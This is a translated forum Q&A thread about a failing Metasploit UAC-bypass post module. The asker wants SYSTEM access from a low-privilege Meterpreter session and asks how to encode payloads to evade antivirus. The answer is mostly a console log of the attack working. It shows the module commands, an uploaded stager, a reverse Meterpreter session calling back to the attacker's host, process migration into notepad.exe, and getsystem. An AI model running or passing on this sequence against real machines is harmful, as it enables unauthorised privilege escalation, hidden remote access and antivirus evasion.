0

post/windows/escalate/bypassuac 对我来说似乎失败了

出于某种原因,我无法让后期利用模块 bypassuac 工作。这就是我所做的:

  1. 在目标机器上打开了一个 Meterpreter 会话(作为 NETWORKSERVICE 用户)
  2. 将会话置于后台
  3. 尝试像这样使用后期利用模块:

    使用 post/windows/escalate/bypassuac set SESSION 1 set LHOST 192.168.1.100 set LPORT 4444 exploit

  4. 该端口尚未使用,所以应该没问题。

  5. 输出如下:

    [-] 处理程序未能绑定到 192.168.1.100:4444 [ ] 在 0.0.0.0:4444 上启动反向处理程序 [] 正在启动有效负载处理程序... [ ] 将绕过 UAC 可执行文件上传到文件系统... [ ] Meterpreter stager可执行文件 73802 字节长正在上传.. [ ] 已将代理上传到文件系统.... [ ] 后模块执行完成

  6. 然后它返回控制台,什么都不做,没有新的会话,什么都没有。

我检查了以下内容:

  1. 手动将可执行文件 bypassuac-x86.exe 上传到目标。那工作得很好。
  2. 检查病毒扫描程序的警钟是否没有从可执行文件中响起。他们没有

有没有一种手动运行可执行文件的方法,有人可以解释一下如何打开一个具有系统级访问权限的新meterpreter会话吗?

或者我可以以某种方式对有效负载进行编码并使用我的自定义模板来逃避所有防病毒的可能性吗?我还没有找到任何对后期开发模块进行编码的选项。

提前致谢

哈尔瓦尔

4

1 回答 1

-2
msf exploit(handler) > use post/windows/escalate/bypassuac
msf post(bypassuac) > show options

Module options:

Name Current Setting Required Description
—- ————— ——– ———–
RHOST no Host
RPORT 4444 no Port
SESSION yes The session to run this module on.

msf post(bypassuac) > set SESSION 1
SESSION => 1
msf post(bypassuac) > exploit

[*] Started reverse handler on 192.168.1.100:4444
[*] Starting the payload handler…
[*] Uploading the bypass UAC executable to the filesystem…
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Uploaded the agent to the filesystem….
[*] Executing the agent with endpoint 192.168.1.100:4444 with UACBypass in effect…
[*] Post module execution completed
msf post(bypassuac) >
[*] Sending stage (749056 bytes) to 192.168.1.100
[*] Meterpreter session 2 opened (192.168.1.100:4444 -> 192.168.1.102:1565) at Thu Jan 06 12:41:13 -0500 2011
[*] Session ID 2 (192.168.1.100:4444 -> 192.168.1.102:1565) processing InitialAutoRunScript ‘migrate -f’
[*] Current server process: zuWlXDpYlOMM.exe (2640)
[*] Spawning a notepad.exe host process…
[*] Migrating into process ID 3276
[*] New server process: notepad.exe (3276)

msf post(bypassuac) > sessions -i 2
[*] Starting interaction with 2…

meterpreter > getsystem
…got system (via technique 1).
meterpreter > sysinfo
于 2014-01-15T04:26:31.043 回答